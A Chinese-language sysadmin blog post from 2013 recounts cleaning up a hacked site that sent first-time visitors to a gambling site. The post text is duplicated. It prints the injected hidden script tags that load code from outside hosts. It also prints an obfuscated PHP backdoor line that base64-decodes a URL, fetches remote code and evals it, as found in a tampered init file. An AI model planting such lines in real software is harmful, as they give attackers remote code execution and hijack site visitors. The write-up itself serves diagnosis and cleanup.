网站被挂码(浏览器第一次打开会跳出博彩网站)
2013-10-11 14:04:41 来源:我爱运维网 评论:0 点击:
最近网站莫名奇妙的首页出现空白,同时发现搜索引擎收录的链接是一个博彩网站的内容,但链接地址却是我们网站的。打开搜索引擎收录的链接地...
最近网站莫名奇妙的首页出现空白,同时发现搜索引擎收录的链接是一个博彩网站的内容,但链接地址却是我们网站的。
打开搜索引擎收录的链接地址,浏览器第一次打开会跳出博彩网站。查看网站源代码,发现源代码顶部有这样一段代码:
<div style='display:none'><script language='javascript' src='http://count21.51yes.com/click.aspx?id=214346876&logo=12' charset='gb2312'></script><script type='text/javascript' src='http://api.bctbbs.net/Bet/Seo.js'></script></div>
显然网站被人挂码了!找遍了所有文件,都没找到这代码是哪里来的(grep -r "Seo.js" *)。
查看最近修改过的文件,只有一个文件(init.xxx.php)修改过,看到一段不明白的代码:
eval(base64_decode(file_get_contents(base64_decode('aHR0cDovL2FwaS5iY3RiYnMubmV0L2JldC50eHQ='))));
这么一段代码!
应该是指向http://api.bctbbs.net/bet.txt,而这个txt文件的内容又是编码了的文件:总算找出来了.
清除掉就正常了。也有在config.php中挂码的哦。
打开搜索引擎收录的链接地址,浏览器第一次打开会跳出博彩网站。查看网站源代码,发现源代码顶部有这样一段代码:
<div style='display:none'><script language='javascript' src='http://count21.51yes.com/click.aspx?id=214346876&logo=12' charset='gb2312'></script><script type='text/javascript' src='http://api.bctbbs.net/Bet/Seo.js'></script></div>
显然网站被人挂码了!找遍了所有文件,都没找到这代码是哪里来的(grep -r "Seo.js" *)。
查看最近修改过的文件,只有一个文件(init.xxx.php)修改过,看到一段不明白的代码:
eval(base64_decode(file_get_contents(base64_decode('aHR0cDovL2FwaS5iY3RiYnMubmV0L2JldC50eHQ='))));
这么一段代码!
应该是指向http://api.bctbbs.net/bet.txt,而这个txt文件的内容又是编码了的文件:总算找出来了.
清除掉就正常了。也有在config.php中挂码的哦。
分享到:
收藏
评论排行
- ·Windows(Win7)下用Xming...(92)
- ·使用jmx client监控activemq(20)
- ·Hive查询OOM分析(14)
- ·复杂网络架构导致的诡异...(8)
- ·使用 OpenStack 实现云...(7)
- ·影响Java EE性能的十大问题(6)
- ·云计算平台管理的三大利...(6)
- ·Mysql数据库复制延时分析(5)
- ·OpenStack Nova开发与测...(4)
- ·LTPP一键安装包1.2 发布(4)
- ·Linux下系统或服务排障的...(4)
- ·PHP发布5.4.4 和 5.3.1...(4)
- ·RSYSLOG搭建集中日志管理服务(4)
- ·转换程序源码的编码格式[...(3)
- ·Linux 的木马程式 Wirenet 出现(3)
- ·Nginx 发布1.2.1稳定版...(3)
- ·zend framework文件读取漏洞分析(3)
- ·Percona Playback 0.3 development release(3)
- ·运维业务与CMDB集成关系一例(3)
- ·应该知道的Linux技巧(3)